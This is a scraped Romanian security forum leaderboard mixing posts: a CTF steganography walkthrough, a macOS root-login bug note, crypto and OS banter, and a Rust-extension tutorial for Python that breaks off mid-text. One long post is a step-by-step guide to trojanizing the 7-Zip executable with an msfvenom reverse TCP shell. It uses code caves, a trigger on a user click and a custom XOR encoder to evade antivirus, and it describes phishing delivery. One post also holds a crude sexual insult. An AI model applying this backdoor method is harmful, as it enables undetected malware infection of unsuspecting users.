Jump to content

Leaderboard


Popular Content

Showing content with the highest reputation since 11/13/17 in all areas

  1. 18 points
    Mi-am facut si eu blog. Nu o sa scriu prea des, doar asa, din cand in cand... https://nytrosecurity.com/
  2. 8 points
  3. 8 points
    Try logging with the user "root" without a password on the latest ver of MacOS (try two times) https://mobile.twitter.com/lemiorhan/status/935581020774117381 LE: Already news https://www.laptopmag.com/articles/root-macos-high-sierra
  4. This post cannot be displayed because it is in a forum which requires at least 10 posts to view.
  5. 6 points
    Walkthrough: @Usr6 1. Descarcam imaginea si verificam daca e integra: # curl -s https://rstforums.com/forum/uploads/monthly_2017_11/the_big_fat_panda.jpg.07e36e8e2681213cd21cbe01d72e9baa.jpg --output The_Big_Fat_Panda.jpg && md5sum The_Big_Fat_Panda.jpg 409302f21ea7dcfe2ed9bbf3c810081c The_Big_Fat_Panda.jpg 2. Deschidem imaginea cu editor hex(am folosit Bless pe Ubuntu) si verificam daca dupa imagine mai este ceva. Ne uitam daca dupa biti FF D9 mai apare ceva. In cazul nostru observam: PK.. NobodyUnderstandMe.jpg PK - inseamna ca avem o arhiva, zip 3. Extragem arhiva din imagine: # unzip The_Big_Fat_Panda.jpg Obtinem o alta imagine: "NobodyUnderstandMe.jpg" . Incercam sa facem acelasi lucru ca la cealalta imagine, dar ne cere o parola si ne da un puzzle: Cateodata DA inseamna DA si NU inseamna NU, cateodata DA inseamna NU si NU inseamna Da, cateodata DA inseamna POATE si POATE inseamna NU, cateodata NU inseamna POATE si POATE... AI INTELESSSSS? DANUDADANUNUDANUDANUNUDADADADANUDANUNUDADADANUNUDANUNUDADADADANUDANUNUNUDADANUDADANUDADADADADANUDANUNUDANUDADANUDANUDADANUDADANUDANUNUDANUNUNUDADANUNUDADADANUNUDANUNUDADANUDANUDANUNUNUDADANUDADANUNUDADADANUNUDANUNUDADADADANUDANUNUNUDANUDADA Initial m-am oprit aici si am cerut hint, mi-a fost oferita imaginea: https://rstforums.com/forum/applications/core/interface/imageproxy/imageproxy.php?img=https://upload.wikimedia.org/wikipedia/commons/thumb/7/75/Macbook_Pro_Power_Button_-_Macro_(5477920228).jpg/220px-Macbook_Pro_Power_Button_-_Macro_(5477920228).jpg&key=65b8c92411b156ea5a00ea79269010df0e1ad7e390288503459d91a50af16a4d # Din care extrage linkul: https://upload.wikimedia.org/wikipedia/commons/thumb/7/75/Macbook_Pro_Power_Button_-_Macro_(5477920228).jpg/220px-Macbook_Pro_Power_Button_-_Macro_(5477920228).jpg 4. Cautam pe google dupa imagine si ajungem pe pagina wiki: https://en.wikipedia.org/wiki/Power_symbol # Observam citatul: The symbol for the standby button was created by superimposing the symbols "|" and "o"; however, it is commonly misinterpreted as the numerals "0" and "1" 5. Luam sirul cu DAsi NU unde inlocuim "DA" cu 0 si "NU" cu 1, obtinem: 010011010110000101100011011000010111001001000001011010010100100101101110011000110110010101110010011000110110000101110100 # Il convertim din binar in ASCII si obtinem: MacarAiIncercat 6. Vedem ca asta este parola("MacarAiIncercat" te poate duce in eroare, eu initial am crezut ca nu asa trebuia sa procedez) dupa care obtinem un fisier text: DA, chiar e ceea ce pare, doar ca standard=dradnats vpGWkp6TipPfkYrfno2a35GaiZCWmt+bmt+Q34+Nmpiei5aNmt+Mj5qclp6Tnt+PmpGLjYrfnt+Zlt+ekZaSnpPT35CSipPflpGMnt+PmpGLjYrfnt+bmomakZbfkJLfno2a35GaiZCWmt+bmt+am4qcnouWmtPfmpuKnJ6Llp7fmZ6cmt+blpmajZqRi57fm5aRi42a35CekpqRlt+Mlt+ekZaSnpOa0d+yno2ciozfq4qTk5aKjN+8lpyajZD= 7. Observam ca e un base64, observam si hintul: "standard=dradnats". Cautam pe google implementarea algoritmului base64: https://en.wikibooks.org/wiki/Algorithm_Implementation/Miscellaneous/Base64#Javascript_2 Facem un reverse la lista base64chars si rulam functia pe stringul nostru: https://jsfiddle.net/9vdbamd9/1/ base64chars = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/"; # devine base64chars = '/+9876543210zyxwvutsrqponmlkjihgfedcbaZYXWVUTSRQPONMLKJIHGFEDCBA' Stringul decodat: Animalul nu are nevoie de o pregatire speciala pentru a fi animal, omul insa pentru a deveni om are nevoie de educatie, educatia face diferenta dintre oameni si animale. Marcus Tullius Cicero
  6. 6 points
    During a black-box penetration test we encountered a Java web application which presented us with a login screen. Even though we managed to bypass the authentication mechanism, there was not much we could do. The attack surface was still pretty small, there were only a few things we could tamper with. 1. Identifying the entry point In the login page I noticed a hidden POST parameter that was being sent for every login request: <input type="hidden" name="com.ibm.faces.PARAM" value="rO0..." /> The famous Base64 rO0 (ac ed in HEX) confirmed us that we were dealing with a Base64 encoded Java serialized object. The Java object was actually an unencrypted JSF ViewState. Since deserialization vulnerabilities are notorious for their trickiness, I started messing with it. Full Article: https://securitycafe.ro/2017/11/03/tricking-java-serialization-for-a-treat/
  7. 5 points
    Si daca nu va avea lumea motive sa-ti multumeasca, vei oferi vreo muiere din viata ta altora pentru satisfactie alternativa? Pentru ca afirmatii de genul ori se fac de cineva credibil (cu track record in investitii de succes in crypto), insider trading ori insotite de ceva argumente logice. Altfel sunt irelevante, chiar daca wabi are un background si potential interesant.
  8. This post cannot be displayed because it is in a forum which requires at least 10 posts to view.
  9. 5 points
    md5(crack_me.jpg) = C720E708AB375E531BB77DCA9DD08D38
  10. 5 points
    Am folosit Windows 6 ani, Linux un an si macOS 3 ani, cu aproximatie, pentru ca o perioada le-am folosit in dual boot pentru scopuri diferite. Prefer macOS din toate punctele de vedere, cu exceptia jocurilor. Eu le judec dupa cat de bine arata si ruleaza pe acelasi sistem, aceleasi resurse, pentru ca a existat o perioada in care le-am incercat pe toate pe acelasi config, si macOS s-a comportat cel mai bine, in combinatia de aspect, resurse consumate, features si viteza. Celelalte doua au prea multe dezavatanje pentru mine: Linux: - Majoritatea software-ului profesional lipseste, iar virtualizarea e o solutie, dar e penibila - dezavantajul asta e cel mai important, pur si simplu nu poti folosi alternativele free pe care le oferta; - Interfata pare sa stea sa cada in orice moment, nimic nu da senzatia de rigiditate pe Linux, te lovesti de tot felu de glitch-uri la fiecare pas. Am folosit LXDE, XFCE, KDE, GNOME, Unity. Unity ; - Cand rezolvi o problema, te folosesti aproape mereu de terminal, e clar ca totul e dedicat administratorilor, nici nu pot sa inteleg cum a ajuns Linux asa popular prin home users. Windows: - Fiecare update e mai penibil ca anteriorul. Interfata aia e vesnic cu cativa ani -- Microsoft e vesnic praf la capitolul design; - Resursele consumate sunt mai mari decat pe macOS -- din nou, pe acelasi config; - Dupa zeci de ani in productie, inca nu reuseste sa se fereasca mai eficient de virusi, trebuie sa te bazezi pe solutii externe ca sa te protejezi; - Are nevoie de restart la foarte multe operatii. Ma omoara treaba asta; - Sistemul de update-uri este execrabil. Iti intrerupe munca ca sa-si dea el restart si dureaza mult prea mult. Nu cred ca este in cautarea unei concluzii, a si precizat ca se asteapta la raspunsuri subiective. Poate doar e interesat de experienta noastra cu OS-urile. Diferenta dintre distributii e de DE (Desktop Environment) si de package manager (apt in Debian si derivatele, pacman in Arch, yum in RedHat si derivatele etc), sau lipsa lui, restul nu sunt sesizabile pentru un home user. Ca sa alegi una, conteaza foarte mult cat de mult efort esti dispus sa depui ca s-o instalezi. De exemplu, daca ai chef sa-ti instalezi singur DE-ul, o distributie ca Arch mi se pare o alegere buna, pentru ca are package manager bun si nu consuma foarte multe resurse inutile out of the box. Daca nu ai chef sa-ti instalezi singur DE-ul, poti folosi distributiile derivate din Ubuntu: Lubuntu, Xubuntu, Kubuntu, Ubuntu Gnome, dar daca nu ai multe resurse la dispozitie, o sa observi o diferenta in viteza.
  11. 5 points
    Table of Contents [hide] 1 Introduction 2 Self Imposed Restrictions 3 Methods used: 4 Criteria for PE file selection for implanting backdoor 4.1 ASLR: 4.2 Static Analysis 5 Backdooring PE file 6 Adding a new Section header method 6.1 Hijack Execution Flow 6.2 Adding Shellcode 6.3 Modifying shellcode 6.4 Spawning shell 6.5 Pros of adding a new section header method 6.6 Cons of adding a new section header method 7 Triggering shellcode upon user interaction + Codecaves 7.1 Code Caves 7.2 Triggering Shellcode Upon user interaction 7.3 Spawning Shell 8 Custom Encoding Shellcode 8.1 Spawning shell 9 Conclusion Introduction During Penetration testing engagement you are required to backdoor a specific executable with your own shellcode without increasing the size of the executable or altering its intended functionality and hopefully making it fully undetectable (FUD) how would you do it?. For example, after recon, you gather information that a lot number of employees use a certain “program/software”. The social engineering way to get in the victim’s network would be a phishing email to employees with a link to download “Updated version of that program”, which actually is the backdoored binary of the updated program. This post will cover how to backdoor a legitimate x86 PE (Portable Executable) file by adding our own reverse TCP shellcode without increasing the size or altering the functionality. Different techniques are also discussed on how to make the backdoor PE fully undetectable (FUD). The focus in each step of the process is to make the backdoored file Fully undetectable. The word “undetectable” here is used in the context of scan time static analysis. Introductory understanding of PE file format, x86 assembly and debugging required. Each section is building upon the previous section and no topic is repeated for the sake of conciseness, one should reference back and forth for clarity. Self Imposed Restrictions Our goal is to backdoor a program in a way that it becomes fully undetectable by anti viruses, and the functionality of the backdoored program should remain the same with no interruptions/errors. For anti-virus scanning purposes we will be using NoDistribute.There are a lot of way to make a binary undetectable, using crypters that encode the entire program and include a decoding stub in it to decode at runtime, compressing the program using UPX, using veil-framework or msfvenom encodings. We will not be using any of such tools. The purpose is to keep it simple and elegant! For this reason I have the following self imposed restrictions:- No use to Msfvenom encoding schemes, crypters, veil-framework or any such fancy tools. Size of the file should remain same, which means no extra sections, decoder stubs, or compressing (UPX). Functionality of the backdoored program must remain the same with no error/interruptions. Methods used: Adding a new section header to add shellcode User interaction based shellcode Trigger + codecaves. Dual code caves with custom encoder + triggering shellcode upon user interaction Criteria for PE file selection for implanting backdoor Unless you are forced to use a specific binary to implant a backdoor the following points must be kept in mind. They are not required to be followed but preferred because they will help reducing the AV detection rate and making the end product more feasible. The file size of executable should be small < 10mb, Smaller size file will be easy to transfer to the victim during a penetration testing engagement. You could email them in ZIP or use other social engineering techniques. It will also be convenient to debug in case of issues. Backdoor a well known product, for example Utorrent, network utilities like Putty, sysinternal tools, winRAR , 7zip etc. Using a known PE file is not required, but there are more chances of AV to flag an unknown PE backdoor-ed than a known PE backdoor-ed and the victim would be more inclined to execute a known program. PE files that are not protected by security features such as ASLR or DEP. It would be complicated to backdoor those and won’t make a difference in the end product compared to normal PE files. It is preferable to use C/C++ Native binaries. It is preferable to have a PE file that has a legitimate functionality of communicating over the network. This would fool few anti viruses upon execution when backdoor shellcode will make a reverse connection to our desired box. Some anti viruses would not flag and will consider it as the functionality of the program. Chances are network monitoring solutions and people would consider malicious communication as legitimate functionality. The Program we will be backdooring is 7Zip file archiver (GUI version). Firstly lets check if the file has ASLR enabled. ASLR: Randomizes the addresses each time program is loaded in memory, this way attacker cannot used harcoded addresses to exploit flaws/shellcode placement. Powershell script result shows no ASLR or DEP security mechanism As we can see in the above screenshot, not much in terms of binary protection. Lets take a look at some other information about the 7zip binary. Static Analysis Static Analysis of 7zip binary The PE file is 32 bit binary, has a size of about 5mb. It is a programmed in native code (C++). Seems like a good candidate for our backdoor. Lets dig in! Backdooring PE file There are two ways to backdoor Portable executable (PE) files. Before demonstrating both of them separately it is important to have a sense of what do we mean by backdooring a PE file?. In simple terms we want a legitimate windows executable file like 7zip achiever (used for demonstration) to have our shellcode in it, so when the 7zip file is executed our shellcode should get executed as well without the user knowing and without the anti viruses detecting any malicious behavior. The program (7zip) should work accurately as well. The shellcode we will be using is a stageless MSFvenom reverse TCP shell. Follow this link to know the difference between staged and stageless payloads Both of the methods described below has the same overall process and goal but different approaches to achieve it. The overall process is as follow:- Find an appropriate place in memory for implanting our shell code, either in codecaves or by creating new section headers, both methods demonstrated below. Copy the opcodes from stack at the beginning of program execution. Replace those instructions with our own opcodes to hijack the execution flow of the application to our desired location in memory. Add the shellcode to that memory location which in this case is stageless TCP reverse shell. Set the registers back to the stack copied in first step to allow normal execution flow. Adding a new Section header method The idea behind this method is to create a new header section in PE file, add our shellcode in newly created section and later point the execution flow it that section. The new section header can be created using a tool such as LordPE. Open Lord PE Go to section header and add the section header (added .hello) at the bottom. Add the Virtual size and Raw size 1000 bytes. Note that 1000 is in hexadecimal (4096 bytes decimal). Make the section header executable as we have to place our Shellcode in this section so it has to be executable, writable and readable. Save the file as original. Adding a new header section Now if we execute the file, it wont work because we have added a new section of 1000h bytes, but that header section is empty. Binary not executing because of empty header section To make to file work normally as intended, we have to add 1000h bytes at the end of the file because right now the file contains a header section of 1000 bytes but that section is empty, we have to fill it up by any value, we are filling it up by nulls (00). Use any hex editor to add 1000 hexademical bytes at the end of the file as shown below. Adding 1000h bytes at the end of the file We have added null values at the end of the file and renamed it 7zFMAddedSection.exe. Before proceeding further we have to make sure now our executable 7zFMAddedSection.exe, is working properly and our new section with proper size and permissions is added, we can do that in Ollydbg by going to memory section and double clicking PE headers. PE Headers in Ollydbg Hijack Execution Flow We can see that our new section .hello is added with designated permissions. Next step is to hijack the execution flow of the program to our newly added .hello section. When we execute the program it should point to .hello section of the code where we would place our shellcode. Firstly note down the first 5 opcodes, as will need them later when restoring the execution flow back. We copy the starting address of .hello section 0047E000 open the program in Ollydbg and replace the first opcode at address 004538D8 with JMP to 0047E000. Replacing the starting address with JMP to new section Right click -> Copy to executable -> all modifications -> Save file. We saved the file as 7zFMAddedSectionHijacked.exe (File names getting longer and we are just getting started!) Up-till now we have added a new header section and hijacked the execution flow to it. We open the file 7zFMAddedSectionHijacked.exe in Ollydbg. We are expecting execution flow to redirect to our newly added .hello section which would contain null values (remember we added nulls using hexedit?). Starting of .hello section Sweet! We have a long empty section .hello section. Next step is to add our shellcode from the start of this section so it gets triggered when the binary is executed. Adding Shellcode As mentioned earlier we will be using Metasploit’s stagless windows/shell_reverse_tcp shellcode. We are not using any encoding schemes provided by msfvenom, most of them if not all of them are already flagged by anti viruses. To add the shellcode firstly we need push registers on to the stack to save their state using PUSHAD and PUSHFD opcodes. At the end of shellcode we pop back the registers and restore the execution flow by pasting initial (Pre hijacked) program instructions copied earlier and jumping back to make sure the functionality of 7zip is not disturbed. Here is the sequence of instructions PUSHAD PUSHFD Shellcode.... POPAD POPFD Restore Execution Flow... We generate windows stageless reverse shellcode using the following arguments in mfsvenom msfvenom -p windows/shell_reverse_tcp LHOST=192.168.116.128 LPORT=8080 -a x86 --platform windows -f hex Copy the shellcode and paste the hex in Ollydbg as right click > binary > binary paste , it will get dissembled to assembly code. Added shellcode at the start of .hello section Modifying shellcode Now that we have our reverse TCP shellcode in .hello section its time to save the changes to file, before that we need to perform some modifications to our shellcode. At the end of the shellcode we see an opcode CALL EBP which terminates the execution of the program after shellcode is executed, and we don’t want the program execution to terminate, infact we want the program to function normally after the shellcode execution, for this reason we have to modify the opcode CALL EBP to NOP (no operation). Another modification that needs to be made is due to the presence of a WaitForSingleObject in our shellcode. WaitForSignleObject function takes an argument in milliseconds and wait till that time before starting other threads. If the WaitForSignleObject function argument is -1 this means that it will wait infinite amount of time before starting other threads. Which simply means that if we execute the binary it will spawn a reverse shell but normal functionality of 7zip would halt till we close our reverse shell. This post helps in finding and fixing WaitForSignleObject. We simply need to modify opcode DEC INC whose value is -1 (Arugment for WaitForSignleObject) to NOP. Next we need to POP register values off the stack (to restore the stack value pre-shellcode) using POPFD and POPAD at the end of shellcode. After POPFD and POPAD we need to add the 5 hijacked instructions(copied earlier in hijack execution flow) back, to make sure after shellcode execution our 7zip program functions normally. We save the modifications as 7zFMAddedSectionHijackedShelled.exe Spawning shell We setup a listener on Kali Box and execute the binary 7zFMAddedSectionHijackedShelled.exe. We get a shell. 7zip binary works fine as well with no interruption in functionality. We got a shell! How are we doing detection wise? Detection Rate Not so good!. Though it was expected since we added a new writeable, executable section in binary and used a known metasploit shellcode without any encoding. Pros of adding a new section header method You can create large section header. Large space means you don’t need to worry about space for shellcode, even you can encode your shellcode a number of times without having to worry about its size. This could help bypassing Anti viruses. Cons of adding a new section header method Adding a new section header and assigning it execution flag could alert Anti viruses. Not a good approach in terms of AV detection rate. It will also increase the size of original file, again we wouldn’t want to alert the AV or the victim about change of file size. High detection rate. Keeping in mind the cons of new section header method. Next we will look at two more methods that would help help us achieve usability and low detection rate of backdoor. Triggering shellcode upon user interaction + Codecaves What we have achieved so far is to create a new header section, place our shellcode in it and hijack the execution flow to our shellcode and then back to normal functionality of the application. In this section we will be chaining together two methods to achieve low detection rate and to mitigate the shortcomings of new adder section method discussed above. Following are the techniques discussed:- How to trigger our shellcode based on user interaction with a specific functionality. How to find and use code caves. Code Caves Code caves are dead/empty blocks in a memory of a program which can be used to inject our own code. Instead of creating a new section, we could use existing code caves to implant our shellcode. We can find code caves of different sizes in almost of any PE. The size of the code cave does matter!. We would want a code cave to be larger than our shellcode so we could inject the shellcode without having to split it in smaller chunks. The first step is to find a code cave, Cave Miner is an optimal python script to find code caves, you need to provide the size of the cave as a parameter and it will show you all the code caves larger than that size. finding code caves for injection We got two code caves larger than 700 bytes, both of them contain enough space for our shellcode. Note down the virtual address for both caves. Virtual address is the starting address of the cave. Later We will hijack the execution flow by jumping to the virtual addresses. We will be using both caves later, for now, we only require one cave to implant in our shellcode. We can see that the code cave is only readable, we have to make it writable and executable for it to execute our shellcode. We do that with LORDPE. Making .rsrc writeable and executable Triggering Shellcode Upon user interaction Now that we have a code cave we can jump to, we need to find a way to redirect execution flow to our shellcode upon user interaction. Unlike in the previous method, we don’t want to hijack the execution flow right after the program is run. We want to let the program run normally and execute shellcode upon user interaction with a specific functionality, for example clicking a specific tab. To accomplish this we need to find reference strings in the application. We can then hijack the address of a specific reference string by modifying it to jump to code cave. This means that whenever a specific string is accessed in memory the execution flow will get redirected to our code cave. Sounds good? Let see how do we achieve this. Open the 7zip program in Ollydbg > right click > search for > all reference text strings Found a suitable reference string In reference strings we found an interesting string, a domain (http://www.7-zip.org). The memory address of this domain gets accessed when a user clicks on about > domain. Website button functionality Note that we can have multiple user interaction triggers that can be backdoored in a single program using the referenced strings found. For the sake of an example we are using the domain button on about page which upon click opens the website www.7-zip.org in browser. Our objective is to trigger shellcode whenever a user clicks on the domain button. Now we have to add a breakpoint at the address of domain string so that we can then modify its opcode to jump to our code cave when a user clicks on the website button.We copy the address of domain string 0044A8E5 and add a breakpoint. We then click on the domain button in the 7zip program. The execution stops at the breakpoint as seen in the below screenshot:- Execution stops at break point address 0044A8E5 (http;//www.7zip.org/) now we can modify this address to jump to code cave, so when a user clicks on the website button execution flow would jump to our code cave, where in next step we will place our shellcode. Firstly we copy couple of instructions after 0044A8E5 address as they will be used again when we want to point execution flow back to it after shellcode execution to make sure normal functionality of 7zip. inject backdoor into exe After modification to jmp 00477857 we save the executable as 7zFMUhijacked.exe . Note that the address 00477857 is the starting address of codecave 1. We load the 7zFMUhijacked.exe in Ollydbg and let it execute normally, we then click on the website button. We are redirected to an empty code cave. Nice! we have redirected execution flow to code cave upon user interaction. To keep this post concise We will be skipping the next steps of adding and modifying the shellcode as these steps are the same explained above “6.2 Adding shellcode” and “6.3 Modifying shellcode“. Spawning Shell We add the shellcode, modify it, restore the execution flow back to from where we hijacked it 0044A8E5 and save the file as 7zFMUhijackedShelled.exe. The shellcode used is stageless windows reverse TCP. We set a netcat listener, run 7zFMUhijackedShelled.exe , click on the website button. Fully Undetectable backdoor PE Files Everything worked as we expected and we got a shell back! . Lets see how are we doing detection wise? Triggering shellcode upon user interaction + Codecaves detection. Thats good! we are down from 16/36 to 3/38. Thanks to code caves and triggering shellcode upon user interaction with a specific functionality. This shows a weakness in detection mechanism of most anti viruses as they are not able to detect a known msfvenom shellcode without any encoding just because it is in a code cave and triggered upon user interaction with specific functionality. The detection rate 3/38 is good but not good enough (Fully undetectable). Considering the self imposed restrictions, the only viable route from here seem to do custom encoding of shellcode and decode it in memory upon execution. Custom Encoding Shellcode Building upon what we previously achieved, executing shellcode from code cave upon user interaction with a specific program functionality, we now want to encode the shellcode using XOR encoder. Why do we want to use XOR, a couple of reasons, firstly it is fairly easy to implement, secondly we don’t have to write a decoder for it because if you XOR a value 2 times, it gives you the original value. We will encode the shellcode with XOR once and save it on disk. Then we will XOR the encoded value again in memory at runtime to get back the original shellcode. Antiviruses wouldn’t be able to catch it because it is being done in memory! We require 2 code caves for this purpose. One for shellcode and one for encoder/decoder. In finding code caves section above we found 2 code caves larger than 700 bytes both of them have fair enough space for shellcode and encoder/decoder. Below is the flow chart diagram of execution flow. Custom encoding shellcode in code caves + Triggering shellode upon user interaction So we want to hijack the program execution upon user interaction of clicking on the domain button to CC2 starting address 0047972e which would contain the encoder/decoder XOR stub opcodes, it will encode/decode the shellcode that resides in CC1 starting address 00477857, after CC2 execution is complete we will jump to CC1 to start execution which would spawn back a shell, after CC2 execution we will jump back from CC2 to where we initially hijacked the execution flow with clicking the domain button to make sure the functionality of the 7zip program remains the same and the victim shouldn’t notice any interruptions. Sounds like a long ride, Lets GO! Note that the steps performed in the last section wouldn’t be repeated so reference back to hijacking execution upon user interaction, adding shellcode in codecaves, modifying shellcode and restoring the execution flow back to where we hijacked it. Firstly we Hijack the execution flow from address 0044A8E5 (clicking domain button) to CC2 starting address 0047972e and save the modifications as file on disk. We run the modified 7zip file in Ollydbg and trigger the hijacking process by clicking on the domain button. Hijacking execution flow to CC2 Now that we are in CC2, before writing our XOR encoder here, we will firstly jump to starting address of CC1 and implant our shellcode so that we get the accurate addresses that we have to use in XOR encoder. Note that the first step of hijacking to CC2 can also be performed at the end as well, as it won’t impact the overall execution flow illustrated in flowchart above. We jump to CC1 , implant, modify shellcode and restore the execution flow to 0044A8E5 from where we hijacked to CC2 to make sure smooth execution of 7zip program functionality after shellcode. Note that implanting, modifying shellcode and restoring execution flow is already explained in previous sections. Bottom of shellocode at CC1 Above screenshot shows the bottom of shellocode at CC1, note down the address 0047799B, this is where the shellcode ends, next instructions are for restoring the execution flow back. So we have to encode from starting of the shellcode at address 00477859 till 0047799B. We move to 00477857 the starting address of CC2, we write XOR encoder, following are the opcodes for XOR encoder implementation. PUSH ECX, 00477857 // Push the starting address of shellcode to ECX. XOR BYTE PTR DS:[EAX],0B // Exclusive OR the contents of ECX with key 0B INC ECX // Increase ECX to move to next addresses CMP ECX,0047799B // Compare ECX with the ending address of shellcode JLE SHORT 00479733 // If they are not equal, take a short jump back to address of XOR operation JMP 7zFM2.00477857 // if they are equal jump to the start of shellcode As we are encoding the opcodes in CC1, we have to make sure the header section in which the CC1 resides is writeable otherwise Ollydbg will show access violation error. Refer back to codecaves section to know how to make it writable and executable. We add a breakpoint at JMP 7zFM2.00477857 after the encoding is performed and we are about to jump back to encoded shellcode. If we go back to CC1 we will see that out shellcode is encoded now. Custom encode shellcode in memory All is left to save the modifications of both the shellcode at CC1 and the encoder at CC2 to a file we named it as 7zFMowned.exe. Lets see if its working as intended. Spawning shell We setup a listener on port 8080 on our Kali box, run 7zFMbackdoored.exe in windows and click on domain button . 7zip website pops up in the browser and if we go back to our kali box. We got a shell How are we doing detection wise? Fully undetectable PE file using Dual code caves, custom encoder and trigger upon user interaction Conclusion Great! we have achieved fully undetectable backdoor PE file that remains functional with the same size. Sursa: https://haiderm.com/fully-undetectable-backdooring-pe-files/
  12. 5 points
    Am discutat chestia asta la facultate(sunt in domeniu) si pot aparea multe complicatii. Chirurgul cu care am discutat a zis ca este posibil, insa rata de succes este mica. Fiecare om are anumite "mutatii" ca sa le zic asa la nivel de ADN. Se presupune ca administrand imunosupresoare pentru a nu respinge transplantul, este posibil sa traiasca pana la 10-15 ani, dar asta este valabil in transplantul hepatic, de cord, etc. Aici vorbim de nervi, neuroni, celule gliale, care au o structura mult mai fragila fata de cele de mai sus. Pot aparea foarte usor boli de structura a sistemului nervos. Este posibil, dar putin probabil sa fie un succes, mai ales pe termen lung.
  13. 4 points
    What is InfoCon? InfoCon is a community supported, non-commercial archive of all the past hacking related convention material that can be found. https://infocon.org/
  14. 4 points
    Gluma revizuita: A boy asked his bitcoin-investing dad for $20. Dad: $15.56? What do you need $24.21 for?
  15. 4 points
    Investiti in oua. Multumiti-mi mai tarziu.
  16. 4 points
    oho... nu exista ceva sa pot scripta sau sa programez, am incercat... nu exista nici un patern... Pur si simplu caut pe net ce ICO-uri apar, ce software creaza, sau ce idei au... investesc in ele si astept. Iar la ICO-uri, nu e asa simplu.. trebuie sa te uiti dupa multe chestii pe care nu le pot spune aici. Dar ideea e ca functioneaza, pierzi castigi.... mai mult castigi la sfarsit de zi/saptamana/luna. Trebuie doar sa nu te panichezi si sa HODL moneda respectiva pana ajunge la un anumit prag... Uite: https://we.tl/s-idH2dUOpfV vezi astea ca sa-ti faci o idee despre trend...
  17. 4 points
    Windows, ofc. Nu am bani de mac ca sunt sarak, nu sunt masochist sa bag linux.
  18. 4 points
    What is Rust? Rust is a systems programming language that runs blazingly fast, prevents segfaults, and guarantees thread safety. Featuring zero-cost abstractions move semantics guaranteed memory safety threads without data races trait-based generics pattern matching type inference minimal runtime efficient C bindings Description is taken from rust-lang.org. Why does it matter for a Python developer? The better description of Rust I heard from Elias (a member of the Rust Brazil Telegram Group). There is a bunch of Rust packages out there to help you extending Python with Rust. I can mention Milksnake created by Armin Ronacher (the creator of Flask) and also PyO3 The Rust bindings for Python interpreter. See a complete reference list at the bottom of this article. Let’s see it in action For this post, I am going to use Rust Cpython, it’s the only one I have tested, it is compatible with stable version of Rust and found it straightforward to use. Pros: It is easy to write Rust functions and import from Python and as you will see by the benchmarks it worth in terms of performance. Cons: The distribution of your project/lib/framework will demand the Rust module to be compiled on the target system because of variation of environment and architecture, there will be a compiling stage which you don’t have when installing Pure Python libraries, you can make it easier using rust-setuptools or using the MilkSnake to embed binary data in Python Wheels. Python is sometimes slow Yes, Python is known for being “slow” in some cases and the good news is that this doesn’t really matter depending on your project goals and priorities. For most projects, this detail will not be very important. However, you may face the rare case where a single function or module is taking too much time and is detected as the bottleneck of your project performance, often happens with string parsing and image processing. Example Let’s say you have a Python function which does a string processing, take the following easy example of counting pairs of repeated chars, but have in mind that this example can be reproduced with other string processing functions or any other generally slow process in Python. # How many subsequent-repeated group of chars are in the given string? abCCdeFFghiJJklmnopqRRstuVVxyZZ... {millions of chars here} 1 2 3 4 5 6 Python is slow for doing large string processing, so you can use pytest-benchmark to compare a Pure Python (with Iterator Zipping) function versus a Regexp implementation. # Using a Python3.6 environment $ pip3 install pytest pytest-benchmark Then write a new Python program called doubles.py import re import string import random # Python ZIP version def count_doubles(val): total = 0 # there is an improved version later on this post for c1, c2 in zip(val, val[1:]): if c1 == c2: total += 1 return total # Python REGEXP version double_re = re.compile(r'(?=(.)\1)') def count_doubles_regex(val): return len(double_re.findall(val)) # Benchmark it # generate 1M of random letters to test it val = ''.join(random.choice(string.ascii_letters) for i in range(1000000)) def test_pure_python(benchmark): benchmark(count_doubles, val) def test_regex(benchmark): benchmark(count_doubles_regex, val) Run pytest to compare: $ pytest doubles.py ============================================================================= platform linux -- Python 3.6.0, pytest-3.2.3, py-1.4.34, pluggy-0.4. benchmark: 3.1.1 (defaults: timer=time.perf_counter disable_gc=False min_roun rootdir: /Projects/rustpy, inifile: plugins: benchmark-3.1.1 collected 2 items doubles.py .. ----------------------------------------------------------------------------- Name (time in ms) Min Max Mean ----------------------------------------------------------------------------- test_regex 24.6824 (1.0) 32.3960 (1.0) 27.0167 (1.0) test_pure_python 51.4964 (2.09) 62.5680 (1.93) 52.8334 (1.96) ----------------------------------------------------------------------------- Lets take the Mean for comparison: Regexp – 27.0167 <– less is better Python Zip – 52.8334 Extending Python with Rust Create a new crate crate is how we call Rust Packages. Having rust installed (recommended way is Rust is https://www.rustup.rs/ )also available on Fedora and RHEL repositories by the rust-toolset I used rustc 1.21.0 In the same folder run: cargo new pyext-myrustlib It creates a new Rust project in that same folder called pyext-myrustlib containing the Cargo.toml (cargo is the Rust package manager) and also a src/lib.rs (where we write our library implementation). Edit Cargo.toml It will use the rust-cpython crate as dependency and tell cargo to generate a dylib to be imported from Python. [package] name = "pyext-myrustlib" version = "0.1.0" authors = ["Bruno Rocha <rochacbruno@gmail.com>"] [lib] name = "myrustlib" crate-type = ["dylib"] [dependencies.cpython] version = "0.1" features = ["extension-module"] Edit src/lib.rs What we need to do: Import all macros from cpython crate. Take Python and PyResult types from CPython into our lib scope. Write the count_doubles function implementation in Rust, note that this is very similar to the Pure Python version except for: It takes a Python as first argument, which is a reference to the Python Interpreter and allows Rust to use the Python GIL. Receives a &str typed val as reference. Returns a PyResult which is a type that allows the rise of Python exceptions. Returns an PyResult object in Ok(total) (Result is an enum type that represents either success (Ok) or failure (Err)) and as our function is expected to return a PyResult the compiler will take care of wrapping our Ok on that type. (note that our PyResult expects a u64 as return value). Using py_module_initializer! macro we register new attributes to the lib, including the __doc__ and also we add the count_doubles attribute referencing our Rust implementation of the function. Attention to the names libmyrustlib, initlibmyrustlib, and PyInit. We also use the try! macro, which is the equivalent to Python’stry.. except. Return Ok(()) – The () is an empty result tuple, the equivalent of None in Python. #[macro_use] extern crate cpython; use cpython::{Python, PyResult}; fn count_doubles(_py: Python, val: &str) -> PyResult<u64> { let mut total = 0u64; // There is an improved version later on this post for (c1, c2) in val.chars().zip(val.chars().skip(1)) { if c1 == c2 { total += 1; } } Ok(total) } py_module_initializer!(libmyrustlib, initlibmyrustlib, PyInit_myrustlib, |py, m | { try!(m.add(py, "__doc__", "This module is implemented in Rust")); try!(m.add(py, "count_doubles", py_fn!(py, count_doubles(val: &str)))); Ok(()) }); Now let’s build it with cargo $ cargo build --release Finished release [optimized] target(s) in 0.0 secs $ ls -la target/release/libmyrustlib* target/release/libmyrustlib.d target/release/libmyrustlib.so* <-- Our dylib is here Now let’s copy the generated .so lib to the same folder where our doubles.py is 